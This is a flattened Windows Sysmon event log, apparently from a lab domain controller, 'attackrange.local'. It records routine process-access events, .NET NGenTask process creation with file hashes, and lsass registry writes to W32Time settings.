13:44:00.690{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2C01-00000000A301}2792C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.612{59A5CD1D-90A0-6005-2B01-00000000A301}44362516C:\Windows\system32\conhost.exe{59A5CD1D-90A0-6005-2A01-00000000A301}3240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.612{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2B01-00000000A301}4436C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.596{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.596{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.596{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.596{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.596{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.596{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.596{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.596{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.596{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.596{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2A01-00000000A301}3240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.596{59A5CD1D-90A0-6005-2301-00000000A301}36844120C:\Windows\system32\taskhostw.exe{59A5CD1D-90A0-6005-2A01-00000000A301}3240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b56bc|UNKNOWN(00007FF8288911E2) 154100x80000000000000005285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.608{59A5CD1D-90A0-6005-2A01-00000000A301}3240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe4.7.2053.0 built by: NET47REL1Microsoft .NET Framework optimization serviceMicrosoft® .NET FrameworkMicrosoft CorporationNGenTask.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe" /RuntimeWide /StopEvent:396C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=310EC059A68DEB69CFC32CFA946FEFE0,SHA256=7BC95DCD791A505FDD9FD0E117EB0BD5AC4F28176E8127FFB39521DAEF670970,IMPHASH=00000000000000000000000000000000{59A5CD1D-90A0-6005-2301-00000000A301}3684C:\Windows\System32\taskhostw.exetaskhostw.exe /RuntimeWide 10341000x80000000000000005284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.581{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2901-00000000A301}4440C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.581{59A5CD1D-90A0-6005-2301-00000000A301}36844220C:\Windows\system32\taskhostw.exe{59A5CD1D-90A0-6005-2901-00000000A301}4440C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b56bc|UNKNOWN(00007FF8288911E2) 154100x80000000000000005273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.584{59A5CD1D-90A0-6005-2901-00000000A301}4440C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe4.7.2053.0 built by: NET47REL1Microsoft .NET Framework optimization serviceMicrosoft® .NET FrameworkMicrosoft CorporationNGenTask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe" /RuntimeWide /StopEvent:880C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=D4FCDD915CAA2B207531B145FD538E1A,SHA256=4279C50E5BF0F5F89358CA5BF1876827BF4D055DCE6BDBDEA56D4AD9F5047CCE,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{59A5CD1D-90A0-6005-2301-00000000A301}3684C:\Windows\System32\taskhostw.exetaskhostw.exe /RuntimeWide 13241300x80000000000000005272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:00.190{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x80000000000000005271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:00.190{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00094e33) 13241300x80000000000000005270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:00.190{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed97-0x97e34de5) 